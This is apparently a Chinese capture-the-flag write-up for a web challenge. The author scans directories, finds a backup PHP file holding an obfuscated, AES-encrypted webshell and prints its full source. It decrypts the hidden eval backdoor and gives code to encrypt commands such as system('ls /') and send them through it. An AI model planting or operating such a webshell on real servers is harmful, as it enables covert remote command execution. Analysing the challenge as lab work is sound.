首先扫目录,然后扫到备份文件
然后找到describedssTest.php
打开
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K) {
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'] . $encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K) {
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
?>解密d8得到
<?php
@eval("if(md5(@\$_GET['id']) === \$p8) {
@eval(trim(d(\$_POST['d'], \$p8)));
}");想办法得到p8
3b7430adaed18facca7b799229138b7b是20241026两次md5的成果,所以要在get请求里面使用id=04c50eb4bc04c76311d03550ee2c1b71
使用如下代码,可以生成shell命令,将得到的值用d=来post过去
$q = 'system("ls /");';
$encrypted_q = e($q, $p8);
echo "Encrypted: " . $encrypted_q . "\n";
$decrypted_q = d($encrypted_q, $p8);
echo "Decrypted: " . $decrypted_q . "\n";使用
echo d($aaa,$p8)把aaa替换成得到的值就可以得到shell的返回了
发表评论